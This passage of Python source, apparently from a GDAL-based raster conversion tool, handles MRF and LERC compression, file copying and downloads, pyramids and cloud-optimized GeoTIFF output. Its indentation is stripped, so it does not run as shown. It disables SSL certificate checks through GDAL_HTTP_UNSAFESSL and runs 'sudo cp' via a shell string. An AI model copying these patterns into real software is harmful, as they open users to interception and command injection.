rptName = user_data[0].replace(
cldInput, '') if cldInput is not None else user_data[0]
ovrpyramid = rpt.getMetadata(rptName, 'isuniformscale')
m_pyramid = None if ovrpyramid is None else ovrpyramid
py_comp = user_data[CIDX_USER_CONFIG].getValue('Compression')
if (py_comp):
m_comp = py_comp
compression_quality_ = user_data[CIDX_USER_CONFIG].getValue(
'Quality')
if (compression_quality_):
m_compression_quality = compression_quality_
m_interleave = user_data[CIDX_USER_CONFIG].getValue(
CCFG_INTERLEAVE)
if (m_interleave):
m_interleave = m_interleave.upper()
lerc_prec = user_data[CIDX_USER_CONFIG].getValue('LERCPrecision')
if (lerc_prec):
m_lerc_prec = lerc_prec
except BaseException: # could throw if index isn't found
pass # ingnore with defaults.
args.append('-of')
args.append('MRF')
args.append('-co')
args.append('COMPRESS=%s' % (_LERC if m_comp == _LERC2 else m_comp))
if (m_comp.startswith(_LERC)):
if (m_lerc_prec or
m_comp == _LERC2 or
m_comp == _LERC):
args.append('-co')
args.append('OPTIONS="{}{}"'.format('' if not m_lerc_prec else 'LERC_PREC={}'.format(
m_lerc_prec), '{}V2=ON'.format(' ' if m_lerc_prec else '') if m_comp == _LERC2 or m_comp == _LERC else ''))
elif(m_comp == 'jpeg'):
args.append('-co')
args.append('QUALITY=%s' % (m_compression_quality))
args.append('-co')
args.append('INTERLEAVE=%s' % (m_interleave))
args.append('-co')
args.append('NOCOPY=True')
if (m_pyramid):
args.append('-co')
args.append('UNIFORM_SCALE=%s' % (m_scale))
args.append('-co')
args.append('BLOCKSIZE=%s' % (m_bsize))
args.append('-co')
# let's fix the cache extension
cache_source = user_data[0]
isQuotes = cache_source[0] == '"' and cache_source[-1] == '"'
quoteChar = '' if isQuotes else '"'
args.append('CACHEDSOURCE={}{}{}'.format(
quoteChar, cache_source, quoteChar))
# ends
return args
def copy_callback(file, src, dst):
Message(file)
return True
def exclude_callback(file, src, dst):
if (file is None):
return False
(f, e) = os.path.splitext(file)
if (filterPaths(os.path.join(src, file), cfg.getValue(CCFG_RASTERS_NODE)) or
src.lower().startswith('http')):
if (file.lower().endswith(CTIL_EXTENSION_)):
return True
raster_buff.append({'f': file, 'src': '' if src ==
'/' else src, 'dst': dst if dst else ''})
return True
return False
def exclude_callback_for_meta(file, src, dst):
exclude_callback(file, src, dst)
def getSourcePathUsingTempOutput(input):
# cfg, _rpt are global vars.
if (not _rpt or
not getBooleanValue(cfg.getValue(CISTEMPOUTPUT))):
return None
_mk_path = input.replace(cfg.getValue(CTEMPOUTPUT, False), '')
_indx = -1
# if any one of these extensions fails,
if (True in [_mk_path.lower().endswith(i) for i in ['.idx', '.lrc', '.pjg', '.pzp', '.pft', '.ppng', '.pjp', '.aux.xml']]):
# the main (raster) file upload entry in (Reporter) would be set to (no) denoting a failure in one of its associated files.
_indx = _mk_path.rfind('.')
if (_indx == -1):
return (_rpt.findExact('{}{}'.format(_rpt.root, _mk_path)))
for i in _rpt:
if (i.find(_mk_path[:_indx + 1]) != -1):
if (True in [i.endswith(x) for x in cfg.getValue(CCFG_RASTERS_NODE)]):
return i
return None
def setUploadRecordStatus(input, rpt_status):
_rpt_src = getSourcePathUsingTempOutput(input)
if (_rpt_src and
_rpt.updateRecordStatus(_rpt_src, CRPT_UPLOADED, rpt_status)):
return True
return False
def filterPaths(file, patterns):
global cfg
if (not file and
not cfg):
print('Internal/Empty args/filterPaths()')
return False
filePatterns = patterns # cfg.getValue(CCFG_RASTERS_NODE)
matched = False
if (filePatterns):
for pattern in filePatterns:
firstChar = pattern[0]
if (firstChar != '?' and
firstChar != '*' and
firstChar != '['):
pattern = '*' + pattern # force to match the ending.
if (fnmatch.fnmatchcase(file, pattern)):
matched = True
break
return matched
class Copy:
def __init__(self, base=None):
self._base = base
def init(self, src, dst, copy_list, cb_list, user_config=None):
if (not dst or
not src):
return False
self.src = src.replace('\\', '/')
self._input_flist = None
if (not os.path.isdir(self.src)):
if (not os.path.exists(self.src)):
self.message(
'Invalid -input report file ({})'.format(self.src), const_critical_text)
return False
self._input_flist = self.src
try:
global _rpt
self.src = _rpt.root
except Exception as e:
self.message('Report ({})'.format(str(e)), const_critical_text)
return False
if (self.src[-1:] != '/'):
self.src += '/'
self.dst = dst.replace('\\', '/')
if (self.dst[-1:] != '/'):
self.dst += '/'
self.format = copy_list
self.cb_list = cb_list
self.m_user_config = None
self.__m_include_subs = True
if (user_config):
self.m_user_config = user_config
include_subs = self.m_user_config.getValue('IncludeSubdirectories')
# if there's a value either (!None), take it else defaults to (True)
if (include_subs is not None):
self.__m_include_subs = getBooleanValue(include_subs)
return True
def message(self, msg, msgType=None):
if (self._base):
return (self._base.message(msg, msgType))
print(msg)
def processs(self, post_processing_callback=None, post_processing_callback_args=None, pre_processing_callback=None):
log = None
if (self._base):
log = self._base.getMessageHandler
if (log):
log.CreateCategory('Copy')
self.message('Copying non rasters/aux files (%s=>%s)..' %
(self.src, self.dst))
# init - TIL files
is_link = self._input_flist is not None
if (til):
for r, d, f in _rpt.walk() if is_link else os.walk(self.src):
for file in f:
if (not file):
continue
if (not self.__m_include_subs):
# note: first arg to walk (self.src) has a trailing '/'
if ((r[:-1] if r[-1:] == '/' else r) != os.path.dirname(self.src)):
continue
if (file.lower().endswith(CTIL_EXTENSION_)):
_til_filename = os.path.join(r, file)
if (til):
til.addTIL(_til_filename)
for _til in til:
til.process(_til)
# ends
for r, d, f in _rpt.walk() if is_link else os.walk(self.src):
for file in f:
if (not file):
continue
if (not self.__m_include_subs):
# note: first arg to walk (self.src) has a trailing '/'
if ((r[:-1] if r[-1:] == '/' else r) != os.path.dirname(self.src)):
continue
free_pass = False
dst_path = r.replace(self.src, self.dst)
if (('*' in self.format['copy'])):
free_pass = True
if (not free_pass):
_isCpy = False
for _p in self.format['copy']:
if (file.endswith(_p)):
_isCpy = True
break
if (not _isCpy):
continue
isInputWebAPI = isInputHttp = False
if (_rpt and
_rpt._isInputHTTP):
isInputHttp = True
(f, e) = os.path.splitext(file)
# if no file extension at the end of URL, it's assumed we're talking to a web service endpoint which in turn returns a raster.
if (not e):
isInputWebAPI = True
isPlanet = self.src.find(CPLANET_IDENTIFY) != -1
if (filterPaths(os.path.join(r, file), self.format['exclude']) and
# skip 'exclude' list items and always copy (.til) files to destination.
not file.lower().endswith(CTIL_EXTENSION_) or
isInputWebAPI or
isPlanet or
isInputHttp):
if (('exclude' in self.cb_list)):
if (self.cb_list['exclude'] is not None):
if (self.m_user_config is not None):
if (getBooleanValue(self.m_user_config.getValue(CISTEMPOUTPUT))):
# no checks on temp-output validty done here. It's assumed it has been prechecked at the time of its assignment.
dst_path = r.replace(
self.src, self.m_user_config.getValue(CTEMPOUTPUT, False))
_r = r
if (self.m_user_config):
if (self.m_user_config.getValue(CLOAD_RESTORE_POINT)):
if (getBooleanValue(self.m_user_config.getValue(CISTEMPINPUT))):
r = r.replace(
self.src, self.m_user_config.getValue(CTEMPINPUT, False))
if (_rpt and
_rpt._isInputHTTP and
(Report.CHDR_MODE in _rpt._header and
_rpt._header[Report.CHDR_MODE] != 'cachingmrf' and
_rpt._header[Report.CHDR_MODE] != 'rasterproxy')):
_mkRemoteURL = os.path.join(_r, file)
try:
file_url = urlopen(
_mkRemoteURL if not isInputWebAPI else os.path.splitext(_mkRemoteURL)[0])
respHeaders = []
if (sys.version_info[0] < 3):
respHeaders = file_url.headers.headers
else:
for hdr in file_url.getheaders():
respHeaders.append(
'{}: {}'.format(hdr[0], hdr[1]))
isFileNameInHeader = False
for v in respHeaders:
if (v.startswith('Content-Disposition')):
token = 'filename='
if (isPlanet):
if (_mkRemoteURL in _rpt._input_list_info):
_rpt._input_list_info[_mkRemoteURL][Report.CRPT_URL_TRUENAME] = v.split(':')[
1].strip()
isFileNameInHeader = True
if (v.find(token) == -1):
break
f = v.find(token)
if (f != -1):
e = v.find(
'\r', f + len(token))
if (_mkRemoteURL in _rpt._input_list_info):
_rpt._input_list_info[_mkRemoteURL][Report.CRPT_URL_TRUENAME] = v[f + len(
token): e].strip().replace('"', '').replace('?', '_')
isFileNameInHeader = True
break
# aws pre-signed URL support.
elif(v.startswith('x-amz-request-id')):
if (_mkRemoteURL in _rpt._input_list_info):
_rpt._input_list_info[_mkRemoteURL][Report.CRPT_URL_TRUENAME] = file.split('?')[
0]
isFileNameInHeader = True
localPath = self.m_user_config.getValue(
CTEMPINPUT)
if (localPath is None):
if (self.m_user_config.getValue(COP) == COP_COPYONLY):
localPath = self.m_user_config.getValue(
CCFG_PRIVATE_OUTPUT)
# we've to download the file first and save to the name requested.
if (localPath):
r = r.replace(self.src, localPath)
if (not os.path.exists(r)):
makedirs(r)
file = _rpt._input_list_info[_mkRemoteURL][
Report.CRPT_URL_TRUENAME] if isFileNameInHeader else file
self._base.message(
'{}'.format(file_url.geturl()))
with open(os.path.join(r, file), 'wb') as fp:
buff = 4 * 1024 * 1024
while True:
chunk = file_url.read(buff)
if (not chunk):
break
fp.write(chunk)
# mark download/copy status
if (_rpt):
_rpt.updateRecordStatus(
_mkRemoteURL, CRPT_COPIED, CRPT_YES)
# ends
except Exception as e:
self._base.message('{}'.format(
str(e)), self._base.const_critical_text)
# skip fruther processing if 'false' returned from the callback fnc
if (not self.cb_list['exclude'](file, r, dst_path)):
continue
continue
try:
if (('copy' in self.cb_list)):
if (self.cb_list['copy'] is not None):
# skip fruther processing if 'false' returned
if (not self.cb_list['copy'](file, r, dst_path)):
continue
# do not create folders for op==reporting only.
if (not g_is_generate_report):
if (not os.path.exists(dst_path)):
if (not self._base._isRasterProxyFormat('csv')):
makedirs(dst_path)
dst_file = os.path.join(dst_path, file)
src_file = os.path.join(r, file)
do_post_processing_cb = do_copy = True
if (os.path.dirname(src_file.replace('\\', '/')) != os.path.dirname(dst_path.replace('\\', '/')) or
g_is_generate_report):
if (pre_processing_callback):
do_post_processing_cb = do_copy = pre_processing_callback(
src_file, dst_file, self.m_user_config)
if (do_copy):
if (self.m_user_config.getValue(CLOAD_RESTORE_POINT)):
if (_rpt.getRecordStatus(src_file, CRPT_COPIED) == CRPT_YES or
(getBooleanValue(self.m_user_config.getValue(CCLOUD_UPLOAD)) and
_rpt.getRecordStatus(src_file, CRPT_UPLOADED) == CRPT_YES) or
_rpt.operation == COP_UPL):
do_copy = False
if (do_copy):
primaryRaster = _rpt._m_rasterAssociates.findPrimaryExtension(
src_file)
if (primaryRaster):
_ext = _rpt._m_rasterAssociates.findExtension(
src_file)
if (_ext):
_mkPrimaryRaster = '{}{}'.format(
src_file[:len(src_file) - len(_ext)], primaryRaster)
if (_mkPrimaryRaster in _rpt._input_list_info):
if (CTEMPINPUT in _rpt._header):
dst_file = dst_file.replace(
_rpt._header[CRESUME_HDR_OUTPUT], _rpt._header[CTEMPINPUT])
dst_file = self._base.renameMetaFileToMatchRasterExtension(
dst_file)
if (not self._base._isRasterProxyFormat('csv')):
shutil.copyfile(src_file, dst_file)
# Clone folder will get all the metadata files by default.
# do not copy raster associated files to clone path.
if (not primaryRaster):
self._base.copyMetadataToClonePath(
dst_file)
# ends
if (self._input_flist):
_rpt.updateRecordStatus(
src_file, CRPT_COPIED, CRPT_YES)
self.message('{} {}'.format(
CRESUME_MSG_PREFIX if not do_copy else '[CPY]', src_file.replace(self.src, '')))
# copy post-processing
if (do_post_processing_cb):
if (post_processing_callback):
# ignore errors from the callback
ret = post_processing_callback(
dst_file, post_processing_callback_args)
# ends
except Exception as e:
if (self._input_flist):
_rpt.updateRecordStatus(os.path.join(
r, file), CRPT_COPIED, CRPT_NO)
self.message('(%s)' %
(str(e)), self._base.const_critical_text)
continue
self.message('Done.')
if (log):
log.CloseCategory()
return True
def get_group_filelist(self, input_source): # static
m_input_source = input_source.replace('\\', '/')
input_path = os.path.dirname(m_input_source)
file_buff = []
(p, e) = os.path.splitext(m_input_source)
for r, d, f in os.walk(input_path):
for file in f:
mk_path = os.path.join(r, file).replace('\\', '/')
if (mk_path.startswith(p)):
file_buff.append(mk_path)
return file_buff
def batch(self, file_lst, args=None, pre_copy_callback=None):
files_len = len(file_lst)
batch = 1
s = 0
while True:
m = s + batch
if (m >= files_len):
m = files_len
for i in range(s, m):
req = file_lst[i]
(input_file, output_file) = getInputOutput(
req['src'], req['dst'], req['f'], False)
dst_path = os.path.dirname(output_file)
if (not os.path.exists(dst_path)):
makedirs(dst_path)
CCOPY = 0
CMOVE = 1
mode_ = CCOPY # 0 = copy, 1 = move
if (args is not None):
if (isinstance(args, dict)):
if (('mode' in args)):
if (args['mode'].lower() == 'move'):
mode_ = CMOVE
if (mode_ == CCOPY):
self.message('[CPY] %s' % (output_file))
shutil.copyfile(input_file, output_file)
elif (mode_ == CMOVE):
self.message('[MV] %s' % (output_file))
try:
shutil.move(input_file, output_file)
except Exception as e:
self.message(str(e))
s = m
if s == files_len or s == 0:
break
return True
class Compression(object):
def __init__(self, gdal_path, base):
self.m_gdal_path = gdal_path
self.CGDAL_TRANSLATE_EXE = 'gdal_translate'
self.CGDAL_BUILDVRT_EXE = 'gdalbuildvrt'
self.CGDAL_ADDO_EXE = 'gdaladdo'
self.m_id = None
self.m_user_config = None
self._base = base
def init(self, id=None):
if (id):
self.m_id = id
if (not self._base or
not isinstance(self._base, Base) or
not isinstance(self._base.getUserConfiguration, Config)):
Message(
'Err/Internal. (Compression) instance is not initialized with a valid (Base) instance.', const_critical_text)
return False
if (not self._base.isLinux()):
self.CGDAL_TRANSLATE_EXE += CEXEEXT
self.CGDAL_ADDO_EXE += CEXEEXT
self.CGDAL_BUILDVRT_EXE += CEXEEXT
self.m_user_config = self._base.getUserConfiguration
if (CDISABLE_GDAL_CHECK):
# forced failure if the env OR_DISABLE_GDAL was set to True but a GDAL conversion template was used.
self.m_gdal_path = 'z:/'
return True
# internal gdal_path could get modified here.
if (not self.m_gdal_path or
not os.path.isdir(self.m_gdal_path)):
if (self.m_gdal_path):
self.message('Invalid GDAL path ({}) in parameter file. Using default location.'.format(
self.m_gdal_path), const_warning_text)
self.m_gdal_path = os.path.join(os.path.dirname(
os.path.abspath(__file__)), r'GDAL/bin')
if (not os.path.isdir(self.m_gdal_path)):
self.message('GDAL not found at ({}).'.format(
self.m_gdal_path), self._base.const_critical_text)
return False
self.m_user_config.setValue(CCFG_GDAL_PATH, self.m_gdal_path)
# ends
# set gdal_data enviornment path
rootGdal = os.path.dirname(self.m_gdal_path)
os.environ['GDAL_DATA'] = os.path.join(rootGdal, 'data')
# disable CURL SSL certificate problem
os.environ['GDAL_HTTP_UNSAFESSL'] = 'true'
os.environ['LD_LIBRARY_PATH'] = os.path.join(rootGdal, 'lib')
# ends
msg_text = '(%s) is not found at (%s)'
_gdal_translate = os.path.join(
self.m_gdal_path, self.CGDAL_TRANSLATE_EXE)
if (not os.path.isfile(_gdal_translate)):
self.message(msg_text % (self.CGDAL_TRANSLATE_EXE,
self.m_gdal_path), self._base.const_critical_text)
return False
if (CRUN_IN_AWSLAMBDA):
if (not self._base.copyBinaryToTmp(_gdal_translate, '/tmp/{}'.format(self.CGDAL_TRANSLATE_EXE))):
return False
_gdaladdo = os.path.join(self.m_gdal_path, self.CGDAL_ADDO_EXE)
if (not os.path.isfile(_gdaladdo)):
self.message(msg_text % (self.CGDAL_ADDO_EXE,
self.m_gdal_path), self._base.const_critical_text)
return False
if (CRUN_IN_AWSLAMBDA):
if (not self._base.copyBinaryToTmp(_gdaladdo, '/tmp/{}'.format(self.CGDAL_ADDO_EXE))):
return False
# copy shared so binaries. Note> libcurl.so.4 support is installed on Lambda by default.
if (not self._lambdaCopySharedSO('libgdal.so.20')):
return False
return True
def _lambdaCopySharedSO(self, sharedLib):
try:
self.message('# pre-sudo {}'.format(sharedLib))
_so = os.path.join(self.m_gdal_path, sharedLib)
p = subprocess.Popen(
' '.join(['sudo', 'cp', _so, '/var/task']), shell=True)
self.message('# post-sudo {}'.format(sharedLib))
except Exception as e:
self.message('Err. lambda>{}'.format(str(e)))
return False
return True
def message(self, msg, status=const_general_text):
write = msg
if (self.m_id):
write = '[{}] {}'.format(threading.current_thread().name, msg)
self._base.message(write, status)
return True
def buildMultibandVRT(self, input_files, output_file):
if (len(input_files) == 0):
return False
args = [os.path.join(self.m_gdal_path, self.CGDAL_BUILDVRT_EXE)]
args.append(output_file)
for f in (input_files):
args.append(f)
self.message('Creating VRT output file (%s)' % (output_file))
return self._call_external(args)
def compress(self, input_file, output_file, args_callback=None, build_pyramids=True, post_processing_callback=None, post_processing_callback_args=None, **kwargs):
isRasterProxyCaller = False
if (UpdateOrjobStatus in kwargs):
if (not kwargs[UpdateOrjobStatus]):
isRasterProxyCaller = True
if (_rpt):
if (input_file in _rpt._input_list_info and
Report.CRPT_URL_TRUENAME in _rpt._input_list_info[input_file]):
output_file = '{}/{}'.format(os.path.dirname(
output_file), _rpt._input_list_info[input_file][Report.CRPT_URL_TRUENAME])
_vsicurl_input = self.m_user_config.getValue(CIN_S3_PREFIX, False)
_input_file = input_file.replace(
_vsicurl_input, '') if _vsicurl_input else input_file
isTempInput = self._base.getBooleanValue(
self.m_user_config.getValue(CISTEMPINPUT))
if (isTempInput):
if (_rpt):
if (not _rpt._isInputHTTP):
_input_file = _input_file.replace(self.m_user_config.getValue(
CTEMPINPUT, False), '' if _rpt.root == '/' else _rpt.root)
_do_process = ret = True
# get restore point snapshot
if (self.m_user_config.getValue(CLOAD_RESTORE_POINT)):
_get_rstr_val = _rpt.getRecordStatus(_input_file, CRPT_PROCESSED)
if (_get_rstr_val == CRPT_YES or
_rpt.operation == COP_UPL):
if (_rpt.operation != COP_UPL):
self.message('{} {}'.format(
CRESUME_MSG_PREFIX, _input_file))
_do_process = False
# ends
breakInputPath = input_file.split('/')
if (breakInputPath[-1].lower().endswith('.adf')):
breakOututPath = output_file.split('/')
breakInputPath.pop()
breakOututPath.pop()
if (breakInputPath[-1] == breakOututPath[-1]):
breakOututPath.pop()
output_file = '/'.join(breakOututPath) + '/{}.{}'.format(
breakInputPath[-1], self.m_user_config.getValue('Mode').split('_')[0])
post_process_output = output_file
if (_do_process):
out_dir_path = os.path.dirname(output_file)
if (not os.path.exists(out_dir_path)):
try:
# let's try to make the output dir-tree else GDAL would fail
makedirs(os.path.dirname(output_file))
except Exception as exp:
# let's try to sleep for few seconds and see if any other thread has created it.
time.sleep(2)
if (not os.path.exists(out_dir_path)):
self.message('(%s)' %
str(exp), self._base.const_critical_text)
if (_rpt):
_rpt.updateRecordStatus(
_input_file, CRPT_PROCESSED, CRPT_NO)
return False
# ends
isModeClone = self.m_user_config.getValue('Mode') == 'clonemrf'
do_process = (_rpt and _rpt.operation !=
COP_NOCONVERT) and not isModeClone
if (not do_process):
self.message('[CPY] {}'.format(_input_file))
if (input_file.startswith('/vsicurl/')):
try:
_dn_vsicurl_ = input_file.split('/vsicurl/')[1]
file_url = urlopen(_dn_vsicurl_)
validateForClone = isModeClone
with open(output_file, 'wb') as fp:
buff = 4 * 1024 * 1024
while True:
chunk = file_url.read(buff)
if (validateForClone):
validateForClone = False
if (chunk[:CMRF_DOC_ROOT_LEN] != '<{}>'.format(CMRF_DOC_ROOT)):
self.message('Invalid MRF ({})'.format(
_dn_vsicurl_), self._base.const_critical_text)
raise Exception
if (not chunk):
break
fp.write(chunk)
except Exception as e:
if (_rpt):
_rpt.updateRecordStatus(
_input_file, CRPT_PROCESSED, CRPT_NO)
return False
else:
if (isTempInput or
not self._base.getBooleanValue(self.m_user_config.getValue('iss3'))):
shutil.copyfile(input_file, output_file)
if (isModeClone):
# Simulate the MRF file update (to include the CachedSource) which was earlier done via the GDAL_Translate->MRF driver.
try:
_CDOC_ROOT = CMRF_DOC_ROOT
_CDOC_CACHED_SOURCE = 'CachedSource'
_CDOC_SOURCE = 'Source'
doc = minidom.parse(output_file)
nodeMeta = doc.getElementsByTagName(_CDOC_ROOT)
nodeRaster = doc.getElementsByTagName('Raster')
if (not nodeMeta or
not nodeRaster):
raise Exception()
cachedNode = doc.getElementsByTagName(
_CDOC_CACHED_SOURCE)
if (not cachedNode):
cachedNode.append(
doc.createElement(_CDOC_CACHED_SOURCE))
nodeSource = doc.getElementsByTagName(_CDOC_SOURCE)
if (not nodeSource):
nodeSource.append(doc.createElement(_CDOC_SOURCE))
if (nodeSource[0].hasChildNodes()):
nodeSource[0].removeChild(nodeSource[0].firstChild)
nodeSource[0].appendChild(
doc.createTextNode(input_file))
cachedNode[0].appendChild(nodeSource[0])
nodeMeta[0].insertBefore(cachedNode[0], nodeRaster[0])
with open(output_file, "w") as c:
# GDAL mrf driver can't handle XML entity names.
_mrfBody = doc.toxml().replace('"', '"')
_indx = _mrfBody.find('<{}>'.format(_CDOC_ROOT))
if (_indx == -1):
raise Exception()
_mrfBody = _mrfBody[_indx:]
c.write(_mrfBody)
except BaseException:
self.message('Invalid MRF ({})'.format(
input_file), self._base.const_critical_text)
if (_rpt):
_rpt.updateRecordStatus(
_input_file, CRPT_PROCESSED, CRPT_NO)
return False
# ends
do_pyramids = self.m_user_config.getValue('Pyramids')
timeIt = kwargs['name'] if 'name' in kwargs else None
azSAS = self.m_user_config.getValue(CFGAZSAS, False)
bUnicode = False
try:
_ = input_file.encode('ascii')
except UnicodeEncodeError as e:
bUnicode = True
inputRaster = self._base.urlEncode(input_file) if _vsicurl_input and input_file.find(
CPLANET_IDENTIFY) == -1 and not azSAS and not isTempInput and not bUnicode else '"{}"'.format(input_file)
useTokenPath = self._base.convertToTokenPath(inputRaster)
if (useTokenPath is not None):
inputRaster = useTokenPath
if (do_pyramids != CCMD_PYRAMIDS_ONLY and
do_process):
args = [os.path.join(
self.m_gdal_path, self.CGDAL_TRANSLATE_EXE)]
if (args_callback is None): # defaults
args.append('-of')
args.append('MRF')
args.append('-co')
args.append('COMPRESS=LERC')
args.append('-co')
args.append('BLOCKSIZE=512')
else:
# callback user function to get arguments.
args = args_callback(args, [
inputRaster if useTokenPath else input_file, output_file, self.m_user_config, self._base])
if (_rpt):
if (input_file.startswith('/vsicurl/')):
trueFile = input_file.replace('/vsicurl/', '')
if (trueFile in _rpt._input_list_info and
Report.CRPT_URL_TRUENAME in _rpt._input_list_info[trueFile]):
(urlFileName, urlExt) = os.path.splitext(os.path.join(output_file.split(
'?')[0], _rpt._input_list_info[trueFile][Report.CRPT_URL_TRUENAME]))
if (not self._base.getBooleanValue(self.m_user_config.getValue('KeepExtension')) and
args[1] == '-of'):
urlExt = args[2]
post_process_output = output_file = '{}{}{}'.format(
urlFileName, '' if urlExt.startswith('.') else '.', urlExt)
try:
createPath = os.path.dirname(output_file)
if (not os.path.exists(createPath)):
makedirs(createPath)
except Exception as e:
self.message(
str(e), self._base.const_critical_text)
args.append(inputRaster)
useCOGTIFF = self.m_user_config.getValue('cog') == True
if (useCOGTIFF):
output_file += CloudOGTIFFExt
useVsimem = self._base.getBooleanValue(
self.m_user_config.getValue('vsimem'))
args.append('"{}{}"'.format(
'/vsimem/' if useVsimem else '', output_file))
self.message('Converting (%s)..' %
(useTokenPath if useTokenPath else input_file))
ret = self._call_external(
args, name=timeIt, method=TimeIt.Conversion, store=self._base)
lstMsg = self._base._lastMsg
if (isinstance(lstMsg, bytes)): # external msgs could be non-unicode.
lstMsg = lstMsg.decode(encoding='utf-8')
isAwsTokenExpired = lstMsg.find('The provided token has expired') != -1
if (isAwsTokenExpired):
store = S3Storage(self._base)
self.message ('Refreshing token/direct access..')
roleInfo = store.getIamRoleInfo()
os.environ['AWS_ACCESS_KEY_ID'] = roleInfo[store.RoleAccessKeyId]
os.environ['AWS_SECRET_ACCESS_KEY'] = roleInfo[store.RoleSecretAccessKey]
os.environ['AWS_SESSION_TOKEN'] = roleInfo[store.RoleToken]
print ('Retry/External call..')
ret = self._call_external(
args, name=timeIt, method=TimeIt.Conversion, store=self._base)
self.message('Status: (%s).' % ('OK' if ret else 'FAILED'))
if (not ret):
if (_rpt):
_rpt.updateRecordStatus(
_input_file, CRPT_PROCESSED, CRPT_NO)
return ret
# build pyramids is always turned off for rasters that belong to (.til) files.
if (build_pyramids):
if (self._base.getBooleanValue(do_pyramids) or # accept any valid boolean value.
do_pyramids == CCMD_PYRAMIDS_ONLY or
do_pyramids == CCMD_PYRAMIDS_EXTERNAL):
iss3 = self.m_user_config.getValue('iss3')
if (iss3 and do_pyramids == CCMD_PYRAMIDS_ONLY):
if (do_pyramids != CCMD_PYRAMIDS_ONLY): # s3->(local)->.ovr
input_file = output_file
output_file = output_file + '.__vrt__'
self.message('BuildVrt (%s=>%s)' %
(input_file, output_file))
ret = self.buildMultibandVRT([input_file], output_file)
self.message('Status: (%s).' %
('OK' if ret else 'FAILED'))
if (not ret):
if (_rpt):
_rpt.updateRecordStatus(
_input_file, CRPT_PROCESSED, CRPT_NO)
# we can't proceed if vrt couldn't be built successfully.
return ret
kwargs['source'] = timeIt # input_file
ret = self.createaOverview(
'"{}"'.format(output_file), **kwargs)
self.message('Status: (%s).' % ('OK' if ret else 'FAILED'),
self._base.const_general_text if ret else self._base.const_critical_text)
if (not ret):
if (_rpt):
_rpt.updateRecordStatus(
_input_file, CRPT_PROCESSED, CRPT_NO)
return False
if (iss3 and
do_pyramids == CCMD_PYRAMIDS_ONLY):
try:
# *.ext__or__ temp vrt file.
os.remove(output_file)
in_ = output_file + '.ovr'
out_ = in_.replace('.__vrt__' + '.ovr', '.ovr')
if (os.path.exists(out_)):
# probably leftover from a previous instance.
os.remove(out_)
self.message('rename (%s=>%s)' % (in_, out_))
os.rename(in_, out_)
except BaseException:
self.message('Unable to rename/remove (%s)' %
(output_file), self._base.const_warning_text)
if (_rpt):
_rpt.updateRecordStatus(
_input_file, CRPT_PROCESSED, CRPT_NO)
return False
if (useCOGTIFF and
not isRasterProxyCaller):
inputDeflated = output_file
output_file = output_file.replace(CloudOGTIFFExt, '')
compression = self.m_user_config.getValue(
'Compression')
CompressPrefix = 'COMPRESS='
x = [x.startswith(CompressPrefix) for x in args]
posCompression = x.index(True)
args[posCompression] = '{}{}'.format(
CompressPrefix, compression)
args.pop() # prev / output
args.pop() # prev / input
if (compression == 'jpeg'):
gdalInfo = GDALInfo(self._base)
gdalInfo.init(self.m_gdal_path)
if (gdalInfo.process(inputRaster)):
ret = gdalInfo.bandInfo
if (ret and
len(ret) != 1):
args.append('-co')
args.append('PHOTOMETRIC=YCBCR')
QualityPrefix = 'JPEG_QUALITY='
x = [x.startswith(QualityPrefix) for x in args]
posQuality = -1
cfgJpegQuality = self.m_user_config.getValue(
'Quality')
if (cfgJpegQuality is None):
cfgJpegQuality = DefJpegQuality
if (x and
True in x):
posQuality = x.index(True)
if (posQuality == -1):
args.append('-co')
args.append('{}{}'.format(
QualityPrefix, cfgJpegQuality))
else:
args[posQuality] = '{}{}'.format(
QualityPrefix, cfgJpegQuality)
args.append('-co')
args.append('COPY_SRC_OVERVIEWS=YES')
args.append(inputDeflated)
args.append(output_file)
self.message(
'Creating cloud optimized GeoTIFF (%s)' % (output_file))
# remove any user defined GDAL translate parameters when calling GDAL_Translate for the second time to generate COG rasters.
jstr = ' '.join(args)
userGdalParameters = self.m_user_config.getValue(
'GDAL_Translate_UserParameters')
if (userGdalParameters):
x = jstr.find(userGdalParameters)
if (x != -1):
jstr = jstr.replace(userGdalParameters, '')
# ends
args = jstr.split()
ret = self._call_external(args)
try:
os.remove(inputDeflated)
except BaseException:
self.message('Unable to delete the temporary file at ({})'.format(
inputDeflated), self._base.const_warning_text)
self.message('Status: (%s).' %
('OK' if ret else 'FAILED'))
if (not ret):
if (_rpt):
_rpt.updateRecordStatus(
_input_file, CRPT_PROCESSED, CRPT_NO)
return ret
# Do we auto generate raster proxy files as part of the raster conversion process?
rasterProxyPath = None
if (self.m_user_config.getValue(CCLONE_PATH)):
mode = self.m_user_config.getValue('Mode')
modifyProxy = True
RecursiveCall = 'recursiveCall'
if (not mode.endswith('mrf') and
RecursiveCall not in kwargs):
_outputPath = self._base.convertToForwardSlash(os.path.dirname(output_file))
isCloudUpload = self._base.getBooleanValue(
self.m_user_config.getValue(CCLOUD_UPLOAD))
isTmpOutput = self.m_user_config.getValue(CISTEMPOUTPUT)
_mkOutputPath = _outputPath.replace(self.m_user_config.getValue(CTEMPOUTPUT if isTmpOutput else CCFG_PRIVATE_OUTPUT, False), '')
rasterProxyFldr = os.path.join(self.m_user_config.getValue(CCLONE_PATH, False), _mkOutputPath)
rasterProxyPath = os.path.join(rasterProxyFldr, os.path.basename(output_file))
ret = self.compress(output_file, rasterProxyPath, args_Callback_for_meta,
post_processing_callback=None, updateOrjobStatus=False, createOverviews=False, recursiveCall=True, **kwargs)
errorEntries = RasterAssociates.removeRasterProxyAncillaryFiles(
rasterProxyPath)
if (errorEntries):
for err in errorEntries:
self.message('Unable to delete ({})'.format(
err), self._base.const_warning_text)
if (not isCloudUpload):
updateMRF = UpdateMRF(self._base)
if (updateMRF.init(rasterProxyPath, self.m_user_config.getValue(CCLONE_PATH, False), mode,
self.m_user_config.getValue(CCACHE_PATH, False), self.m_user_config.getValue(CCLONE_PATH, False), self.m_user_config.getValue(COUT_VSICURL_PREFIX, False))):
updateMRF.copyInputMRFFilesToOutput()
modifyProxy = False
if (modifyProxy):
updateMRF = UpdateMRF(self._base)
_output_home_path = self.m_user_config.getValue(
CCFG_PRIVATE_OUTPUT, False) # cmdline arg -output
_tempOutputPath = self.m_user_config.getValue(
CTEMPOUTPUT, False)
if (_tempOutputPath):
_output_home_path = _tempOutputPath
if (RecursiveCall in kwargs):
_output_home_path = output_file = os.path.join(
self.m_user_config.getValue(CCLONE_PATH, False), os.path.basename(output_file))
if (updateMRF.init(output_file, self.m_user_config.getValue(CCLONE_PATH, False), mode,
self.m_user_config.getValue(CCACHE_PATH, False), _output_home_path, self.m_user_config.getValue(COUT_VSICURL_PREFIX, False))):
